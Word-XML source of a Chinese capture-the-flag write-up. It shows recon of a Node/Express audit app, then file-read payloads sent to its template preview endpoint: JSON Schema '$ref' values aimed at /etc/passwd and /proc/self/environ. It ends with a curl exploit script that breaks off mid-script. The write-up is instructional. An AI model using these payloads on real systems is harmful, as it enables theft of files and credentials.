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阶段一：前期资产收集</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">通过对站点主页进行探索，收集到如下核心目录与路由：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">GET /</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">├── /login          -&gt; </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">审计员登录</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">├── /register       -&gt; </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">审计员注册</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">├── /dashboard      -&gt; </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">仪表盘（需认证）</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">├── /templates      -&gt; </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">审计模板预览控制台</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">├── /reports        -&gt; </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">审计报告页</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">└── /static/app.js  -&gt; </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">前端逻辑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</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">curl -I</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">命令抓取</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> HTTP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">响应头信息，借此判断服务端的技术架构：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">Server: nginx/1.25.5</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">X-Powered-By: Express</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">由此可知，目标系统基于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rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">环境并搭配了</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Express</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">框架构建。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:pict>
          <v:rect style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="9"/>
    <w:bookmarkStart w:id="13" w:name="header-n9"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">阶段二：业务功能研判</w:t>
      </w:r>
    </w:p>
    <w:bookmarkStart w:id="10" w:name="header-n10"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">2.1 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">账户注册与会话机制</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">在成功创建并登录常规的审计员账号后，系统会通过</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">/api/user/session</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">接口下发当前用户的鉴权数据：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"auditor"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"/api/template/import"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"/api/template/preview"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根据返回结果，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">auditor</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">角色被赋予了以下两个核心</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> API </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的访问权限：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POST /api/template/import</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">— </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">负责导入自定义的审计模板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POST /api/template/preview</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">— </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">用于模板的实时预览</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="10"/>
    <w:bookmarkStart w:id="11" w:name="header-n19"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">2.2 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">解析与预览机制探究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/templates</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">路由下，页面中包含一段英文说明：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BlockText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">"Paste JSON or YAML schema. The preview service resolves nested references for auditors."</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">注意这里的核心词汇</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">"resolves nested references"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">，这暗示了服务端能够处理</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> JSON Schema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rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">外部引用。在后端的实际开发场景中，此类特性往往依赖</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">json-schema-ref-parser</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">等库或是</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> YAML </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">解析器自身的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rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">支持来实现。如果配置不当，极易引入任意文件读取（LFI）的安全隐患。</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="11"/>
    <w:bookmarkStart w:id="12" w:name="header-n24"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">2.3 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">关于</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Reports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浏览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 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">页面时发现系统给出了如下提示：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BlockText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">"No critical finding is visible to ordinary auditors."</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">这明确表明部分机密信息对普通用户不可见，必须具备更高权限（如管理员）方可查看，这与题目背景中提到的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Shadow Vault</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">设定相吻合。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header-n30"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">阶段三：安全漏洞确认</w:t>
      </w:r>
    </w:p>
    <w:bookmarkStart w:id="14" w:name="header-n31"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">3.1 Payload </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的构建与投放</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">我们尝试向</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">/api/template/preview</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">接口直接发送包含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rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">关键字的恶意</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> JSON </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">数据：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">POST /api/template/preview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"schema": {</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">    "$ref": "/etc/passwd"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4"/>
    <w:bookmarkStart w:id="15" w:name="header-n34"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">3.2 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">服务器回显</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">服务端成功回显了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rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">文件的全部数据。至此，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">任意文件读取</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">漏洞被成功证实。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">产生原因分析</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：服务端程序在接收并解析由前端传入的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> JSON Schema </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">数据时，调用了带有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rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">解析功能的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> YAML/JSON </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">库（经后续确认为</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">yaml</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">2.4.2）。由于该依赖包内置的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">YAML.parse()</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">方法在处理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rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">节点时，默认并未阻断对本地文件系统的访问，同时也缺失了路径白名单校验及沙箱隔离机制。这就导致恶意用户能够通过修改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rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的指向路径，轻松窃取服务器上的敏感文件。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header-n38"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">阶段四：深度漏洞利用</w:t>
      </w:r>
    </w:p>
    <w:bookmarkStart w:id="17" w:name="header-n39"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">4.1 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">敏感信息探测</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">第一步是尝试提取当前进程的环境变量，因此将目标指向</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">/proc/self/environ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POST /api/template/preview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"schema": {</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">    "type": "object",</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">    "properties": {</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">      "content": {</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">        "$ref": "/proc/self/environ"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关键技巧提示</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：这里特意将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rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">嵌套在</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">properties.content</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">层级之下，而不是直接放在</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> schema </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的最外层。这种做法的目的是防止</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> YAML </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">引擎在读取类似</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> JavaScript </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">等源代码文件时引发语法解析异常（直接解析会导致解析器试图将</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> JS </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">源码视为</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> YAML </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">格式从而崩溃），从而大幅提升读取复杂文件时的稳定性。</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="17"/>
    <w:bookmarkStart w:id="18" w:name="header-n43"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">4.2 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">提取最终</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Flag</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">在获取到的环境变量数据中，我们直接找到了目标</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Flag </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">字符串：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">NODE_VERSION=20.20.2</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">HOSTNAME=836f0052f625</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">FLAG=ISCC{black_box_schema_ref_to_shadow_vault_2026}</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">PWD=/app</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">NODE_ENV=production</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">测试任务圆满完成，成功拿下</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Flag。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header-n48"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">附录：自动化</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Exploit </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">脚本参考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一键利用脚本</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">BASE="http://39.105.213.28:12606"</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve"># Step 1: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">注册</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">curl -s -c /tmp/sl.txt -b /tmp/sl.txt \</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">  "$BASE/api/register" \</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">  -H 'Content-Type: application/json' \</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">  -d '{"username":"pwn_'$(date +%s)'","password":"pwn"}' &gt; /dev/null</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve"># Step 2: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">登录</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">curl -s -c /tmp/sl.txt -b /tmp/sl.txt \</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">  "$BASE/api/login" \</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">  -H 'Content-Type: application/json' \</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">  -d '{"username":"pwn_'$(date +%s)'","password":"pwn"}' &gt; /dev/null</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve"># Step 3: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Flag</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">curl -s -b /tmp/sl.txt \</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">  "$BASE/api/template/preview" \</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">  -H 'Content-Type: application/json' \</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
